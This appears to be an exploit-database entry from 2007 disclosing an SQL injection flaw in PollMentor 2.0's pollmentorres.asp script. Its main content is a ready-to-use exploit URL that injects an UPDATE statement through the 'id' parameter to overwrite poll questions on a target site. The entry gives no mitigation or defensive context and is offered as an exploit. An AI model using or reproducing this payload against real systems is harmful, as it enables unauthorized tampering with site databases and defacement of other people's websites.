id: 1498
date: 02/13/2007
title: PollMentor 2.0 (pollmentorres.asp id) SQL Injection Vulnerability
author: SaO
cves: 

=================================================================
PollMentor 2.0 (pollmentorres.asp id) SQL Injection Vulnerability
=================================================================


XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
X                                       X
X Author  : SaO                         X
X                                       X
XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX

# Script   : PollMentor v2.0
# Demo     : http://www.aspcode.net/products/pollmentor/demo/pollmentor.asp
# Bug in   : pollmentorres.asp
# Exp.     : 
http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';--




#  0day.today [2023-03-26]  #